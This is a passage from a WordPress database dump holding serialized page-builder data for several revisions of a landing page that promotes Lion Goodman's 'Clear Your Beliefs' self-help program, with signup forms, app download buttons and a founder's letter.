back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2820:"<div id="divStroke" class="letter">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback. I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1394, 1835, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:6:{s:3:"url";s:68:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1392:"<div class="three-container">[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]<center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p"><center><strong>Download the free eBook.</strong></center>\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div>\n<div class="form-input-container-button">	<input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1934:"<div class="three-container">[su_box title="Free App" class=''three-container box_color="#1a2d8c" radius="8"]<center><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1"><center><strong>DOWNLOAD the FREE APP</strong></center></p>\n<p class="tri-panel-p tri-panel-2nd-p-2"><center>Start Clearing Whatever Is In The Way Right Now!</center></p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n\n<div class="form-input-container-button" style="bottom: -5px !important; position: relative;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1280:"<div class="three-container">\n	[su_box title="Complete Program" class=''three-container'' box_color="#1a2d8c" radius="8"]<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px; line-height: 20px;padding-bottom: 23px;"><big><strong>Clear Your Limiting and <br>Negative Beliefs</strong></big> – <big><strong><br>Permanently!</strong></big></p>\n\n<form class="infusion-form rd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" />\n<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="bottom: 4.6px !important; position: relative;"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1431:"<div id="divStroke" class="letter" style="padding-top: 0px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2820:"<div id="divStroke" class="letter">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback. I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1397, 1838, 'panels_data', 'a:3:{s:7:"widgets";a:7:{i:0;a:6:{s:3:"url";s:68:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1392:"<div class="three-container">[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]<center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p"><center><strong>Download the free eBook.</strong></center>\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div>\n<div class="form-input-container-button">	<input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1934:"<div class="three-container">[su_box title="Free App" class=''three-container box_color="#1a2d8c" radius="8"]<center><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1"><center><strong>DOWNLOAD the FREE APP</strong></center></p>\n<p class="tri-panel-p tri-panel-2nd-p-2"><center>Start Clearing Whatever Is In The Way Right Now!</center></p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n\n<div class="form-input-container-button" style="bottom: -5px !important; position: relative;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1271:"<div class="three-container">\n	[su_box title="Complete Program" class=''three-container'' box_color="#1a2d8c" radius="8"]<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px; line-height: 20px;padding-bottom: 23px;"><big><strong>Clear Your Limiting and\nNegative Beliefs</strong></big> <big><strong>\n- Permanently!</strong></big></p>\n\n<form class="infusion-form rd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" />\n<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="bottom: 4.6px !important; position: relative;"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1431:"<div id="divStroke" class="letter" style="padding-top: 0px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2820:"<div id="divStroke" class="letter">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback. I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:574:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n\n<hr id="lines" />\n<center><i>© Copyright 2014 by Lion Goodman</i></center>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1396, 1837, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:6:{s:3:"url";s:68:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1392:"<div class="three-container">[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]<center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p"><center><strong>Download the free eBook.</strong></center>\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div>\n<div class="form-input-container-button">	<input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1934:"<div class="three-container">[su_box title="Free App" class=''three-container box_color="#1a2d8c" radius="8"]<center><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1"><center><strong>DOWNLOAD the FREE APP</strong></center></p>\n<p class="tri-panel-p 